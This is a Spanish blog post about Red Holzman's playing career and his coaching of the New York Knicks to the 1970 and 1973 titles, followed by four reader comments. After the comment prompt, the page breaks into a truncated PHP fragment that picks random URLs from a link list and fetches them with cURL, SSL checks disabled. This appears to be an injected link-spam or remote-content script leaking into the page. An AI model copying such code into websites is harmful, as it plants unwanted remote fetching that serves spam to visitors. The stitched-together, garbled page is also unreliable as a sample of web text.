¿Quién fue Red Holzman?

22 de September de 2011 por txusma

Haciendo limpieza del escritorio descubro un papel con un solo apunte: “¿Quién fue Red Holzman?”. La letra es mía así que debe ser un recordatorio de tiempos pretéritos para escribir, algún día, la historia de este individuo. ¿Pero que descubrí del Sr. Holzman que pudiera interesarme tanto hasta el punto de dedicarle un artículo? Imposible recordarlo. Mejor será que nos informemos.

Como en el caso de Richie Guerin, si eres aficionado de los Knicks es imperdonable que no conozcas a William “Red” Holzman. Se trata del entrenador que guió a la franquicia a sus dos únicos anillos en 1970 y 1973. Además es miembro del HoF desde 1985 y declarado como uno de los 10 mejores entrenadores de la historia por la NBA en 1997. Los Knicks tienen retirado en su honor el número 613 que fueron las victorias que consiguieron bajo su mando.

Holzman comenzó su carrera como jugador en los Rochester Royals de la NBL en la temporada 1944-1945. Aquella temporada ganó el anillo y también el título de Rookie del año. Era un base que destacaba por su defensa, muy intensa y asfixiante. De los 3 años que jugó en la NBL, en 2 apareció en el mejor quinteto de la temporada y en el otro fue nominado para el 2º. Se trata sin duda de uno de los mejores jugadores que pasaron por aquella liga.

En 1948, los Royals y otros 3 equipos de la NBL pasaron a la NBA (por aquel entonces la BAA). El equipo de Holzman lideró la liga regular pero fue eliminado en semifinales de conferencia por los grandes dominadores de aquella época: Los Minneapolis Lakers del gran George Mikan. Sin embargo, la temporada 50-51 cambiaron las tornas. Royals y Lakers volvían a enfrentarse en las finales de conferencia pero Mikan jugó muy mermado debido a una pequeña factura en el tobillo. Minneapolis venció en el primer partido pero los Royals, con Holzman como titular, vencieron los 3 siguientes y se plantaron en la final.

Aquella final supuso todo un acontecimiento en el estado de New York y un cambio radical en la proyección de una liga relegada hasta el momento a un par de parágrafos tras los grandes titulares del beisbol. Se enfrentaban las 2 franquicias del estado, Knicks y Royals, y por primera vez la final era a 7 partidos. El desarrollo y culminación de las finales no puedo ser más emocionante: Los Royals se impusieron en el séptimo partido 79-75 y se llevaron el único anillo que se le escapó a George Mikan.

Holzman jugó un par de temporada más en los Royals antes de llegar a los Milwaukee Hawks donde ejerció de jugador-entrenador. Su llegada y la de Bob Pettitt conviertieron a uno de los peores equipos de la liga en todo un finalista de conferencia. En 1957 abandonó los Hawks para incorporarse al organigrama de los Knicks como asistente. Ya no abandonaría la franquicia hasta 1982, 25 años más tarde.

Red Holzman se convirtió en entrenador en 1967, comenzando así la época dorada de los New York Knicks. En 1969 los Knicks ganaron 18 partidos consecutivos lo que suponía un nuevo récord y en 1970 ganaron su primer anillo de la NBA en un séptimo partido épico frente los Lakers de Wilt Chamberlain. Un Willis Reed completamente lesionado saltó a la cancha y anotó los 4 primeros puntos de su equipo. Posteriormente, y gracias a semejante aporte de moral, Walt Frazier y sus compañeros hicieron el resto. Aquel año, Holzman ganó el CoY y se convirtió en uno de los pocos jugadores que tienen anillos también como entrenadores.

Los Knicks aún llegaron a un par de finales más, en 1972 y 1973, ganando esta última de nuevo frente Los Angeles Lakers. Aquellos Knicks siempre serán recordados como uno de los mejores equipos de todos los tiempos gracias a su juego de equipo, a su defensa y a su inteligencia, marca de la casa de Holzman, nombrado mejor entrenador de la década de los 70.

En 1982, Holzman se retiró de los banquillo con un balance de 696 victorias y 604 derrotas y en 1985 ya era miembro del Hall of Fame. Tras su retirada le fue diagnosticada una leucemia. Murió en New York en 1998.

Comenta

4 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    El momentazo de Reed saliendo a la cancha cojeando es de los míticos entre míticos. Desconocía la historia de Holzman, la verdad. Gracias Txus, gran artículo.

      Citar

  2. Sancho88 dice:
    #2

    Sí, Paul Pierce quiso imitarlo hace cuatro años, pero… fue bastante sucedaneo, con la bici estática y todo el royo. Me parece que Reed sí que estaba cojo de verdad. Pero aquel gesto de Pierce yo estoy convencido que le dio el anillo a Boston, por el tema sicológico de recuperar la caldera del Boston Garden. En eso sí se pareció a la salida de Reed en el Madison. Hace poco también sacaron un mini reportaje de Debuscheere, narrado por Kurt Thomas. Decía tomas que Debusschere era un 6,6 pies, pekeñito pero que pasó a la historia en aquellos Nkickebockers y a él le gustaría también hacerlo en el actual equipo. Yo me descojoné un poco de risa, y pensé en que ha habido jugadores que en la década pasada se lo han llevao crudísimo, como por ejemplo este tío. Hace poco me enteré que Ibaka ha firmado por 3,5 milloncejos hasta 2014 o 2015. Se deben descojonar tipos como Thomas, Van Horn, Curry… ellos sí que saben lo que fue los años de manosrrotas en Nueva York, timo que no se puede igualar en ninguna otra franquicia.

      Citar

  3. MagicJohnson32 dice:
    #3

    ¡No me mentes lo de Pierce, que me enciendo!!

      Citar

  4. andrea dice:
    #4

    que ironico le quito un anillo a los knicks como jugador y le dio años mas tarde dos anillos como entrenador

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>